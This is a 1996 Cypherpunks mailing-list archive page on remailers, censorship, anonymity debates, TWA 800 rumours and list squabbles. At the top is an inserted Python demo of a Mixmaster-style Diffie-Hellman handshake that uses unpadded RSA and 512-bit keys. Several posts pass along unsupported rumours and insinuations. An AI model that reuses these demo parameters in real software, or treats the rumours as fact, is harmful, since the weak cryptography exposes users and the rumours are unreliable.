Geiger Consulting WebExplorer & Java Enhanced!!!

Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice
Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
Finger whgiii at amaranth.com for PGP Key and other info
-----------------------------------------------------------

MR/2 Tag->Windows: The Gates of hell.
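
The exchange Lance Cottrell describes earlier on this page in "forward secrecy in mixmaster" (A announces a hash of its DH modulus and sends the modulus only if B lacks it, then A sends its DH half plus a challenge under B's RSA key, and B returns the challenge with its own half) can be traced in the sketch below. It is an added example, not Mixmaster source or code from any poster here; the class and function names, SHA-256, the randomly generated 512-bit primes and the unpadded RSA are assumptions chosen so that it runs on the Python standard library alone.

```python
# Added example, not Mixmaster code. Assumptions: SHA-256 fingerprints, random
# 512-bit primes (not safe primes), raw unpadded RSA. Demo parameters only.
import hashlib
import secrets

def is_probable_prime(n, rounds=24):
    for sp in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % sp == 0:
            return n == sp
    d, s = n - 1, 0
    while d % 2 == 0:
        d, s = d // 2, s + 1
    for _ in range(rounds):                     # Miller-Rabin rounds
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def gen_prime(bits):
    while True:
        cand = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(cand):
            return cand

def rsa_keygen(bits=512, e=65537):
    while True:
        p, q = gen_prime(bits), gen_prime(bits)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:  # e is prime, so e not dividing phi means gcd 1
            return p * q, e, pow(e, -1, phi)

def group_fp(p, g):
    return hashlib.sha256(f"{p:x}:{g:x}".encode()).hexdigest()

def kdf(shared):
    return hashlib.sha256(str(shared).encode()).digest()

class Remailer:
    def __init__(self):
        self.n, self.e, self.d = rsa_keygen()  # long-term key from the key block
        self.group_cache = {}                  # fingerprint -> (p, g) of senders
        self.new_dh_group()

    def new_dh_group(self, bits=512):          # own modulus, replaceable at will
        self.p, self.g = gen_prime(bits), 2

    # ---- sending side (A) ----
    def open_session(self, peer_n, peer_e):
        self._x = secrets.randbelow(self.p - 3) + 2
        self._challenge = secrets.randbits(128)
        m = (pow(self.g, self._x, self.p) << 128) | self._challenge
        return pow(m, peer_e, peer_n)          # DH half + challenge under B's key

    def finish(self, peer_half, echoed):
        if echoed != self._challenge:
            raise ValueError("challenge not returned: peer lacks the RSA key")
        key = kdf(pow(peer_half, self._x, self.p))
        del self._x, self._challenge           # ephemeral secrets end here
        return key

    # ---- receiving side (B) ----
    def learn_group(self, fp, p, g):
        if group_fp(p, g) != fp:
            raise ValueError("modulus does not match the announced hash")
        self.group_cache[fp] = (p, g)

    def answer(self, fp, ciphertext):
        p, g = self.group_cache[fp]
        a_half, challenge = divmod(pow(ciphertext, self.d, self.n), 1 << 128)
        if not 1 < a_half < p - 1:
            raise ValueError("decryption did not yield a valid DH half")
        y = secrets.randbelow(p - 3) + 2       # never stored
        return pow(g, y, p), challenge, kdf(pow(a_half, y, p))

def handshake(a, b, log, pub=None):
    n, e = pub or (b.n, b.e)                   # RSA key that a encrypts to
    fp = group_fp(a.p, a.g)
    log.append("modulus cached" if fp in b.group_cache else "modulus sent")
    if fp not in b.group_cache:
        b.learn_group(fp, a.p, a.g)
    b_half, echoed, key_b = b.answer(fp, a.open_session(n, e))
    return a.finish(b_half, echoed), key_b

def impostor_rejected(a, b, impostor):
    try:                                       # impostor lacks b's private key
        handshake(a, impostor, [], pub=(b.n, b.e))
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    a, b, log = Remailer(), Remailer(), []
    print(handshake(a, b, log)[0].hex(), log, impostor_rejected(a, b, Remailer()))
```

Once `finish` and `answer` return, neither exponent exists any more, so a recorded session plus B's RSA private key yields only the two public DH halves.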
From frissell at panix.com Sun Sep 8 06:27:47 1996
From: frissell at panix.com (Duncan Frissell)
Date: Sun, 8 Sep 1996 21:27:47 +0800
Subject: Edited Edupage, 5 Sep 1996
Message-ID: <2.2.32.19960908113654.00dc4480@panix.com>

>>CHINA SCREENS OUT "SPIRITUAL POLLUTION" ON THE NET
>>The Beijing government has begun blocking as many as 100 Internet sites that
>>offer material the government deems unsuitable for its citizens -- including
>>dissident viewpoints from Hong Kong and Taiwan, sites sponsored by U.S.
>>major media organizations such as CNN and the Washington Post, and sexually
>>explicit sites such as Playboy and Penthouse. An official described the
>>blocked sites as suspected purveyors of "spiritual pollution." (Wall Street
>>Journal 5 Sep 96 B12)

Gee only 100 bad sites on the net out of thousands of web sites. Looks cleaner than a hound's tooth to me. And Germany trying to block two sites a year (but failing). At that rate they'll really "shut 'er down."

Note the subtle problem. With thousands of "bad sites" combined with bureaucratic sloth the governments of the world are bailing with a teaspoon. We can put 'em up faster than they can knock them down particularly since they can't knock them down at all.

DCF

From perry at alpha.jpunix.com Sun Sep 8 06:30:15 1996
From: perry at alpha.jpunix.com (John A. Perry)
Date: Sun, 8 Sep 1996 21:30:15 +0800
Subject: New type2.list/pubring.mix
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone,

I just updated the type2.list/pubring.mix combination on jpunix.com. This update includes the addition of the dustbin and jenanon remailers. Welcome aboard!

The files are available by WWW from www.jpunix.com as well as anonymous FTP from ftp.jpunix.com.

John Perry - perry at alpha.jpunix.com - PGP-encrypted e-mail welcome!
WWW - http://www.jpunix.com
PGP 2.62 key for perry at jpunix.com is on the keyservers.
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjKtO1OTpEThrthvAQHthgQApkbVzoc2NbYMm0U0Wcr3y2LpCY96/adT 2bLBg87S+CIStRHc2XirdjGk97TnN2p/1RBySqOIjH0a9Jajrso2yQYn7nQZ3/2W wIq2ZrQF1971IeajIBSEmNzD4lhr7Tkqi2WhVGHFEVboMvcp7Nw+wGxOfyaXP6mj uvZkIFAfDW0= =O4WA -----END PGP SIGNATURE----- From edyson at edventure.com Sun Sep 8 09:22:21 1996 From: edyson at edventure.com (Esther Dyson) Date: Mon, 9 Sep 1996 00:22:21 +0800 Subject: The Esther Dyson Flap Message-ID: <19960908135750483.AAO156@Esther> FWIW, I'm still collecting some thoughts, because this is a complex topic (as you all know), and I'm tired of having my views misinterpreted and misattributed. So I want to state them clearly and carefully. This is simply a reaction to one item. At 09:12 PM 9/4/96 -0500, Chuck Thompson wrote: >>Date: Tue, 3 Sep 1996 14:23:40 -0700 >>X-Sender: tcmay at mail.got.net >>To: cypherpunks at toad.com >>From: tcmay at got.net (Timothy C. May) >>Subject: Re: The Esther Dyson Flap >>Sender: owner-cypherpunks at toad.com >> ...................... Please note the quote marks carefully. I said [something like] the first paragraph, but the rest is the "reporter" from Scientology, plus a paraphrase. >> >>By the way, the Scientologists have also noted her views: >> >>"Esther Dyson, member of the board of directors of the Electronic Frontier >>Foundation and member of the National Information Infrastructure Advisory >>Council, spoke on the anonymity issue at the fifth Computers, Freedom & >>Privacy (CFP) conference in San Francisco. "I have a concern about the >>spread of bad behavior on the Net," said Dyson. "Anonymity figures into >>this, and I feel that it has proven to not be a positive factor. It breaks >>down >>the community which we are seeking to build, and could turn the 'big >>cities' of the information infrastructure into a big cesspool." >> >>"Remailers who facilitate anonymous postings are part of the problem. 
They >>can act as conduits for those who seek anonymity as a way to act illegally >>without getting caught; yet remailers are able to shield themselves from >>responsibility or liability. >> >>"Computer experts stress that anonymous users should at least be trackable >>by the remailers -- and that ones who act unlawfully can easily put the >>remailers at risk. Dyson noted that in self-regulatory schemes for almost >>any part of the Internet, "visibility, not anonymity, would have a strong >>place."" >> >>(end quote, from "Freedom," at http://www.theta.com/goodman/hijack.htm) >> > Esther Dyson Always make new mistakes! EDventure Holdings 1 (212) 924-8800 1 (212) 924-0240 fax 104 Fifth Avenue New York, NY 10011 USA www.edventure.com High-Tech Forum in Lisbon, October 27-29, 1996 PC Forum in Tucson, Arizona, March 23-26, 1997 From dthorn at gte.net Sun Sep 8 09:23:57 1996 From: dthorn at gte.net (Dale Thorn) Date: Mon, 9 Sep 1996 00:23:57 +0800 Subject: Kiddie porn on the Internet Message-ID: <32324996.2158@gte.net> "News" stories are now circulating on radio about child pornography on the Internet, and how an organization called "Save The Children" is working very hard to identify the traffickers and their accomplii. Save The Children is complaining that they can't find all of the dirty dealers of kid-porn, since much of the traffic is encrypted! So who is Save The Children? First, since they're an international organization raising funds in the U.S., they obviously operate at the pleasure of the State Department. Ho hum. Remember the incidents at the Denny's restaurant chain where Denny's was sued for discrimination against minorities? Did it seem a little bizarre for the 1990's? At the close of the litigation, Denny's suddenly sprouted tons of free fund-raising advertising for Save The Children, including placemats at each table with beautiful logo and address and phone number. Just send the money, etc.
My questions to interested persons included whether someone may have approached Denny's for such cooperation BEFORE the discrimination suits, and whether Denny's may have refused at first. Well, don't jump to conclusions, and this is *NOT* a veiled accusation. I merely suggest that interested parties extend their inquiries into the various Internet-Monitors to include Save The Children. And by the way, I wonder what World Vision and National Medical Enterprises are up to these days? From liberty at gate.net Sun Sep 8 09:44:45 1996 From: liberty at gate.net (Jim Ray) Date: Mon, 9 Sep 1996 00:44:45 +0800 Subject: [NOISE] More From Rumor-central Message-ID: <199609081422.KAA36716@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- [This has nothing to do with cryptography, but it is related to other posts seen here recently.] Miami Herald reports today on page 3A that the National Transportation Safety Bureaucrats are "investigating an American Airlines pilot's report that a missile zoomed by his 757 on Aug. 29 as it flew near NASA and Navy facilities in Virginia on its way to Boston." An NTSB spokesman has confirmed an investigation (termed a 'preliminary probe') is ongoing. Not to be outdone, the FAA is investigating as well. All this is according to the Herald, and I offer no opinions about veracity or trustworthiness of this particular media organ or what caused the crash of flight 800. JMR Regards, Jim Ray -- DNRC Minister of Encryption Advocacy Thursday, September 5 is the day when, in 1698, Russian Czar Peter the Great imposed a tax on...beards. Please, don't tell Congress. [Source: The Advocates for Self-Government.] "As govt.s grow arithmetically, corruption grows exponentially." -- Ray's Law of official corruption. Defeat the Duopoly! Stop the Browne out. Harry Browne for President. Jo Jorgensen for Vice-president. 
http://www.HarryBrowne96.org/ http://www.twr.com/stbo ___________________________________________________________________ PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 http://www.shopmiami.com/prs/jimray ___________________________________________________________________ From rubin at usenix.ORG Sun Sep 8 10:15:40 1996 From: rubin at usenix.ORG (Aviel Rubin) Date: Mon, 9 Sep 1996 01:15:40 +0800 Subject: ANNOUNCEMENT AND CALL FOR PAPERS - 1998 USENIX Security Conference Message-ID: <199609081449.HAA03435@usenix.ORG> ************************************************************************* ANNOUNCEMENT AND CALL FOR PAPERS 7th USENIX Security Symposium January 26-29, 1998 Marriott Hotel-- San Antonio, Texas Sponsored by the USENIX Association, the UNIX and Advanced Computing Systems Professional and Technical Association In cooperation with: The CERT Coordination Center. Important Dates for Refereed Papers Papers due: September 9, 1997 Author notification: October 8, 1997 Camera-ready final papers due: December 9, 1997 Registration Materials Available: End October, 1997 (Authors, see "How to Submit a Refereed Paper" below.) Program Chair Avi Rubin, Bellcore Program Committee Carlisle Adams, Nortel Dave Balenson, Trusted Information Systems Steve Bellovin, AT&T Research Dan Boneh, Princeton University Diane Coe, Mitre Ed Felten, Princeton University Li Gong, JavaSoft Peter Honeyman, CITI, University of Michigan Hugo Krawczyk, IBM Watson Labs Jack Lacy, AT&T Research Hilarie Orman, DARPA/ITO Mike Reiter, AT&T Research David Wagner, University of California, Berkeley Readers Katherine T.
Fithen, CERT Trent Jaeger, IBM Watson Labs Invited talks coordinator: Greg Rose, Qualcomm Conference home page: OVERVIEW The goal of this symposium is to bring together researchers, practitioners, system programmers, and others interested in the latest advances in security and applications of cryptography. This will be a four day symposium with two days of tutorials, followed by two days of refereed paper presentations, invited talks, works-in-progress presentations, and panel discussions. TUTORIALS Monday and Tuesday, January 26-27 Tutorials for both technical staff and managers will provide immediately useful, practical information on topics such as local and network security precautions, what cryptography can and cannot do, security mechanisms and policies, firewalls and monitoring systems. If you are interested in proposing a tutorial, contact the tutorial coordinator, Dan Klein: phone (412)421-2332 email . TECHNICAL SESSIONS Wednesday and Thursday, January 28-29 In addition to the keynote presentation, the technical program includes refereed papers, invited talks, a work in progress session, and panel sessions. There will be Birds-of-a-Feather sessions the last two evenings. You are invited to make suggestions to the program committee via email to . Papers that have been formally reviewed and accepted will be presented during the symposium and published in the symposium proceedings, published by USENIX and provided free to technical session attendees. Additional copies will be available for purchase from USENIX. 
SYMPOSIUM TOPICS Refereed paper submissions are being solicited in areas including but not limited to: * Adaptive security and system management * Analysis of malicious code * Applications of cryptographic techniques * Attacks against networks/machines * Computer misuse and anomaly detection * Copyright protection (technical solutions) * Cryptographic & other security tools * File and file system security * Network security * New firewall technologies * Security in heterogeneous environments * Security incident investigation and response * Security of Mobile Code * User/system authentication * World Wide Web security Note that this symposium is not about new codes, ciphers, nor cryptanalysis for its own sake. Papers must represent novel scientific contributions in computer security with direct relevance to the engineering of secure systems for the commercial sector. HOW TO SUBMIT A REFEREED PAPER (Please read carefully.) The guidelines for submission are a bit different from previous years. Authors must submit a mature paper in postscript format. Any incomplete sections (there shouldn't be many) should be outlined in enough detail to make it clear that they could be finished easily. Full papers are encouraged, and should be about 8 to 15 typeset pages. Submissions must be received by September 9, 1997. Along with your paper, please submit a separate email message containing the title, all authors, and their complete contact information (phone, fax, postal address, email), including an indication of which author is the contact author. Authors will be notified of acceptance on October 8, 1997. All submissions will be judged on originality, relevance, and correctness. Each accepted submission may be assigned a member of the program committee to act as its shepherd through the preparation of the final paper. The assigned member will act as a conduit for feedback from the committee to the authors. Camera-ready final papers are due on December 9, 1997. 
If you would like to receive detailed guidelines for submission and examples of extended abstracts, you may send email to: or telephone the USENIX Association office at (510) 528-8649. The Security Symposium, like most conferences and journals, requires that papers not be submitted simultaneously to another conference or publication and that submitted papers not be previously or subsequently published elsewhere. Papers accompanied by non-disclosure agreement forms are not acceptable and will be returned to the author(s) unread. All submissions are held in the highest confidentiality prior to publication in the Proceedings, both as a matter of policy and in accord with the U.S. Copyright Act of 1976. There will be one or two prizes awarded for best paper(s). WHERE TO SUBMIT For reliability, please send one copy of your paper to the program committee via each of two of the following methods. All submissions will be acknowledged. o Preferred Method: email (Postscript) to: o Alternate Method: postal delivery to Security Symposium USENIX 2560 Ninth St., Ste. #215 Berkeley CA 94710 U.S.A. Phone: (510) 528-8649 o Fax: (510) 548-5738 Vendor Exhibits Demonstrate your security product to our technically astute attendees responsible for security at their sites. We invite you to take part in the Vendor Display. The informal, table-top display allows you to meet with attendees informally and demonstrate in detail your security solutions. Contact CynthiaDeno Email: cynthia at usenix.org Phone: 408.335.9445 Fax 408.335.5327 Works-in-Progress Session (WIPs) The last session of the symposium will be a Works-in-Progress session consisting of five minute presentations. Speakers should provide a one or two paragraph abstract to the program chair by 6:00 pm on January 28, 1998 at the conference. These should be provided in person, not via email. The chair will post the schedule of presentations by noon on the 29th. 
Experience at other conferences has shown that usually, all of them are accepted. The five minute time limit will be strictly enforced. INVITED TALKS There will be several invited talks at the conference in parallel with the refereed papers. If you have suggestions for possible speakers, please send them to . REGISTRATION MATERIALS Materials containing all details of the technical and tutorial programs, registration fees and forms, and hotel information will be available at the end of October 1997. To receive the registration materials, please contact: USENIX Conference Office 22672 Lambert Street, Suite 613 Lake Forest, CA USA 92630 Phone: (714) 588-8649 Fax: (714) 588-9706 Email: Information can also be found under the Conference home page: . From whallen at capitalnet.com Sun Sep 8 10:34:13 1996 From: whallen at capitalnet.com (Wayne H. Allen) Date: Mon, 9 Sep 1996 01:34:13 +0800 Subject: talker Message-ID: <199609081513.LAA14900@ginger.capitalnet.com> At 03:03 AM 9/8/96 +0000, attila wrote: >=Dear Whoever, > > cypherpunks are *not* crackers; this is a cryptographic > and political issues relating to cryptography mailing list. > > Well maybe, political issues galore certainly, but very very little to do with cryptography. I mean what does TWA 800 have to do with this list. I mean let's be completely honest here, whatever the original purpose of the list was for it's been allowed to shift away from its intended purpose considerably. Wayne H.Allen whallen at capitalnet.com Pgp key at www.capitalnet.com/~whallen From dthorn at gte.net Sun Sep 8 11:06:37 1996 From: dthorn at gte.net (Dale Thorn) Date: Mon, 9 Sep 1996 02:06:37 +0800 Subject: Church of Scientology Message-ID: <3232DBB9.68B3@gte.net> Scuttlebutt is, CoS rolled over on some pesky ultra-right-wingers as a favor to Morris Dees and various scumbag associates. For this, CoS got their long-awaited (40-plus years!) federal tax-free status.
This status is big cash, so naturally, interested parties wanted to know under what rules did CoS get their tax-free gift, since long-standing high court decisions laid out the profit-making business plan of CoS in no uncertain terms, explicit and detailed. Problem is, nobody was able to get the details of the policy change - did CoS change their business plan, or did the fed change their rules? From jwilk at iglou.com Sun Sep 8 11:16:10 1996 From: jwilk at iglou.com (Blake Wehlage) Date: Mon, 9 Sep 1996 02:16:10 +0800 Subject: FW: Re: talker Message-ID: >Return-Path: >To: jwilk at iglou.com >Subject: Re: talker >References: >X-Juno-Line-Breaks: 1-5 >From: doom13 at juno.com (Floyd W Odom) >Date: Sun, 08 Sep 1996 10:56:43 EDT Check this out guys & gals > >Hey Blake cyphering sucks. You want to live on the like us? I went to >jail for jackin the westroads. And I still got away wit some shit. > > > >Doom13 > > ========================================== Blake Wehlage Goto: http://members.iglou.com/jwilk From jamesd at echeque.com Sun Sep 8 11:44:58 1996 From: jamesd at echeque.com (James A. Donald) Date: Mon, 9 Sep 1996 02:44:58 +0800 Subject: Encourage Singapore To Come Out Of the Stone Age Message-ID: <199609081635.JAA05916@dns1.noc.best.net> At 12:39 PM 9/3/96 +0800, Enzo Michelangeli wrote: > The idea that rights and values can be "natural" is contradicted by > several thousand years of history, during which absolutism or downright > tyranny have been well more common than freedom. The existence of foot binding in China is not evidence that women's feet have no particular natural shape. > The success of that misleading view in America, and by extension in most > of the western countries, is largely due to the unfortunate influence of > [...]
When one engineer's bridge, designed according to one theory of materials physics, stands up, and another engineer's bridge, designed according to a different theory of material physics, falls down, does that not suggest that the first engineer knows what he is talking about, and the second engineer does not? > In the real world, freedom is a by-product of a materially prosperous > society (which is why capitalism generally produces free societies, but > socialism does not). First, you have this completely the wrong way around: Prosperity is the product of a free society. For example when the Dutch revolted from Spain, they were at first poorer than Spain. Secondly there is ample counter evidence: For example in America before the European conquest, some Indian societies were extremely free and others, such as the Incas, had institutions very similar to modern totalitarianism, yet their material level was very different to today's, and not very different from each other's. Again the Germanic tribes that conquered England had very high levels of liberty, yet were terribly poor, and the Icelanders of Saga period Iceland were very free, yet very poor. > Trying to build a free society by screaming loud > what the "natural" rights are supposed to be, has no better chances of > success than [...] Succeeded the last two times it was tried. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From roger at coelacanth.com Sun Sep 8 11:51:15 1996 From: roger at coelacanth.com (Roger Williams) Date: Mon, 9 Sep 1996 02:51:15 +0800 Subject: talker In-Reply-To: <19960908045041953.AAA106@IO-ONLINE.COM> Message-ID: >>>>> "Chris" == Adamsc writes: > Hmmmm... Want to bet our other friend at juno.com sent him?
I > might just end up killfiling juno.com... Obviously a low-IQ area > of the net. Yup -- you're never going to see a very high SNR out of Juno: "Juno is completely free: no monthly charges, no hourly charges, no per-message charges, no sign-up fees, and no subscription fees. You don't have to pay for the software..." "Instead of charging its members, Juno will rely on revenues derived largely from selectively targeted advertising..." Unfortunately, this policy also means that bogon-rich Junons can't abuse Usenet for free, so they're spending their time party-crashing mailing lists... -- Roger Williams finger me for my PGP public key Coelacanth Engineering consulting & turnkey product development Middleborough, MA wireless * DSP-based instrumentation * ATE tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/ From stephen at iu.net Sun Sep 8 12:08:51 1996 From: stephen at iu.net (Stephen Cobb) Date: Mon, 9 Sep 1996 03:08:51 +0800 Subject: TWA 800 - Friendly Fire? Message-ID: <1.5.4.32.19960908170804.006ae62c@iu.net> > >-Millie >sfuze at tiac.net > >"What we have here is a FAILURE to COMMUNICATE" (some song) > Actually some movie, Cool Hand Luke, Paul Newman. The WAV file is around here somewhere. s. From paul at fatmans.demon.co.uk Sun Sep 8 12:09:29 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Mon, 9 Sep 1996 03:09:29 +0800 Subject: What the NSA is patenting Message-ID: <842190632.29813.0@fatmans.demon.co.uk> >The NSA STM method is related to reading _very subtle_ variations in >magnetic domain modifications. Jitter in read-write head positions can be >thought of as a noise (N) added to some signal (S). > Extraction of signals >in low S/N ratio environments is a well-developed science.
As anyone who has ever subscribed to alt.sex will know ;-) Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" From byrd at ACM.ORG Sun Sep 8 12:47:15 1996 From: byrd at ACM.ORG (Jim Byrd) Date: Mon, 9 Sep 1996 03:47:15 +0800 Subject: Church of Scientology Message-ID: <2.2.16.19960908172415.25478cfe@super.zippo.com> At 07:44 AM 9/8/96 -0700, Dale Thorn wrote: >Scuttlebutt is, CoS rolled over on some pesky ultra-right-wingers as a >favor to Morris Dees and various scumbag associates. For this, CoS got >their long-awaited (40-plus years!) federal tax-free status. > >This status is big cash, so naturally, interested parties wanted to know >under what rules did CoS get their tax-free gift, since long-standing >high court decisions laid out the profit-making business plan of CoS in >no uncertain terms, explicit and detailed. > >Problem is, nobody was able to get the details of the policy change - >did CoS change their business plan, or did the fed change their rules? This is exactly the subject of a lawsuit by Tax Analysts, Inc. against the IRS. This is still in progress. The cult is not a party to this suit, so they can't bring their lawyers into this one. From doom13 at juno.com Sun Sep 8 13:40:08 1996 From: doom13 at juno.com (Floyd W Odom) Date: Mon, 9 Sep 1996 04:40:08 +0800 Subject: No Subject Message-ID: <19960908.123126.3118.1.Doom13@juno.com> Has anyone been on a bbs lately. I just subscribed to cypherpunks mailing list.
From jamesd at echeque.com Sun Sep 8 13:54:00 1996 From: jamesd at echeque.com (James A. Donald) Date: Mon, 9 Sep 1996 04:54:00 +0800 Subject: talker Message-ID: <199609081833.LAA07514@dns2.noc.best.net> At 12:26 PM 9/8/96 -0500, Roger Williams wrote: > Yup -- you're never going to see a very high SNR out of Juno: Yes, the anarchy list has a persistent moron from Juno.com, educated well above his intelligence. A seriously prolific loon. I have told Eudora to transfer everything from juno.com into my loon file, regardless of author. Makes AOL.com look like Caltech. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From askbill at microsoft.com Sun Sep 8 13:54:24 1996 From: askbill at microsoft.com (Askbill Questions) Date: Mon, 9 Sep 1996 04:54:24 +0800 Subject: Thank you Message-ID: Thank you for your email. I appreciate you taking the time to write to me. As you can probably imagine, I receive hundreds of messages from outside of Microsoft each day. While I love to read people's views and share ideas about technology, unfortunately, I am not able to answer each and every inquiry. Instead, I'll be responding to some of your questions in my column. The second column each month will be dedicated to answering questions from readers like you, so keep reading and I'll do my best to address the topics that are of interest to readers worldwide. I also invite you to check out the Microsoft website at http://www.microsoft.com/corpinfo where you can find all of the columns, as well as lots of additional fun and useful information.
Thank you for your continued support of Microsoft and our products and best of luck with all your endeavors, Bill Gates From doom13 at juno.com Sun Sep 8 14:03:51 1996 From: doom13 at juno.com (Floyd W Odom) Date: Mon, 9 Sep 1996 05:03:51 +0800 Subject: 9yrold Message-ID: <19960908.125436.3318.0.Doom13@juno.com> Does anyone out there know any kids mailing lists, because my little brother Richard just joined and he doesn't have anything to mail to he's only 9 years old. floyd odom From jfricker at vertexgroup.com Sun Sep 8 14:04:56 1996 From: jfricker at vertexgroup.com (John F. Fricker) Date: Mon, 9 Sep 1996 05:04:56 +0800 Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL Message-ID: <2.2.32.19960908184651.00ac63d4@vertexgroup.com> At 03:24 AM 9/6/96 -0700, you wrote: > >* wouldn't it be deliciously ironic if the "Free Speech Blue Ribbon" now >attached to so many pages were to be joined by a "Star of David"? This Star >of David symbol could mean "We support freedom to read, and our site >contains the "Radikal" publication which Germans are forbidden to access." > Well I think the Star of David has so many meanings that the message may get muddled. Seems like busy sites can support the mirror of their choice by putting a note such as "This is a Radikal site". The "mispelling" is the medium. >(I know nothing of how such symbolic campaigns are actually launched and >managed, so I'm suggesting the hint of an idea. I do think mirroring the >banned publication (_any_ banned publication, by _any_ government) on as >many sites as possible is a Good Idea.) > Tell two people. Put up a mirror. Add a link on a busy page. Did I miss anything? 
--j http://206.101.74.42 is a Radikal site From pstira at escape.com Sun Sep 8 14:15:53 1996 From: pstira at escape.com (pstira at escape.com) Date: Mon, 9 Sep 1996 05:15:53 +0800 Subject: What the NSA is patenting In-Reply-To: <84215235509971@cs26.cs.auckland.ac.nz> Message-ID: On Sun, 8 Sep 1996 pgut001 at cs.auckland.ac.nz wrote: > >I'm sure there's going to be a REALLY marketable device out of this to get > >royalties off of. > > No, the market for the more mainstream MFM's is small (a few K devices), for > MFSTM's it's even smaller (a few dozen?). MFSTM's are usually built by You obviously did NOT detect my sarcasm about the previous subject. :) -Millie, who was trying to say that patenting such a device is patently stupid From declan at eff.org Sun Sep 8 15:12:07 1996 From: declan at eff.org (Declan McCullagh) Date: Mon, 9 Sep 1996 06:12:07 +0800 Subject: TWA 800 - Friendly Fire? In-Reply-To: Message-ID: Got a note from Brock on the original TWA 800 posting from "MacDonald" -- > I can't believe anyone would stand for this kind of shit. Total, > absolute garbage. And I'll bet anyone $5,000 to prove I'm wrong in > calling his "rumor" from a "reliable source" a total myth. $5,000 ain't chump change. Anyone want to collect? -Declan On Sun, 8 Sep 1996, Black Unicorn wrote: > On Fri, 6 Sep 1996, John Anonymous MacDonald wrote: > > > The latest rumor. > > > > The message came to me from a man who was Safety Chairman for the > > Airline Pilots Association for many years and he is considered an > > expert on safety. He would not ever spread idle rumor. In short, > > he is usually quite certain before saying anything! > > Feel free to cite his credentials AFTER you disclose his name. 
> > :) > > -- > I hate lightning - finger for public key - Vote Monarchist > unicorn at schloss.li > // declan at eff.org // I do not represent the EFF // declan at well.com // From declan at eff.org Sun Sep 8 15:18:06 1996 From: declan at eff.org (Declan McCullagh) Date: Mon, 9 Sep 1996 06:18:06 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: <1.5.4.32.19960907204437.0068b4d8@pop3.interramp.com> Message-ID: I will of course defer to Will's grasp of the facts, since I haven't been following this story or interviewing the principals. (Though I have read the court's opinion and Reid's article in the Philly Inquirer.) The judge did mention "status quo" in his opinion. I would hope that "status quo" would mean the ability of ISPs to offer and enforce whatever contracts they want -- including banning incoming spam -- without the intervention of the government. Unless, of course, the ISP breaks the contract, but in that case the plaintiffs should be the customers, not the spammer. Contrary to what CyberPromo has been telling the press, Internet email is not the U.S. Postal Service. In fact, the USPS has a rather horrific monopoly that has given rise to Comstockery in the last century, the Robert Thomas case more recently, laws giving the USPS the sole right to insert mail in your mailbox, and las banning private enterprise from delivering "non-urgent" mail. That kind of bureaucratic monopolistic foolishness is not what the Net needs. -Declan On Sat, 7 Sep 1996, Will Rodger wrote: > > At 12:27 PM 9/7/96 -0700, Declan McCullagh wrote: > >If AOL wants to stop spammers, let them. They have every right to do so as > >long as their agreement with their customers permits it. It's a matter of > >contract law between AOL and its customers and should not involve the > >spammers and a lawsuit brought by the spammers. > > > >It seems as though the judge was snookered by the spammers' claim of U.S. > >Mail-like service, free speech, blah. 
The right to free speech does > >extend to corporations; in that way, it includes the right *not* to speak. > > > > Declan raises a good point. But I'm guessing it's a bit more complex than > that. CyberPromo and AOL lawyers tell me the court slapped down AOL simply > to "keep the status quo." Both sides used those very words, in fact. > > What's more, CyberPromo talks a good game on the First Amendment, but used > computer fraud and unfair competition statutes - not the Bill of Rights - in > its original filing against AOL. So what's going on? > > It seems Weiner is _very_ aware that this case deals with things never > before argued in court. No one has really sorted out just how much e-mail - > if any - an ISP is obligated to carry against its wishes. What Weiner > decides this fall may not set the kind of precedent that the case of the > Pentagon Papers did, but will be important for a while at least. > > Will // declan at eff.org // I do not represent the EFF // declan at well.com // From declan at eff.org Sun Sep 8 15:24:14 1996 From: declan at eff.org (Declan McCullagh) Date: Mon, 9 Sep 1996 06:24:14 +0800 Subject: Cypherpunks subscribers - Singapore and NZ gvts, plus IRS Message-ID: I suppose it would be only polite to ask the Singapore government folks and IRS employees to join our conversation. The cypherpunks list now has nearly 1,400 direct subscribers, plus whoever reads it through local mail-news gateways. (Note I'm not indicating that a .gov.sg or .irs.gov address implies anything about an individual's personal political beliefs.)
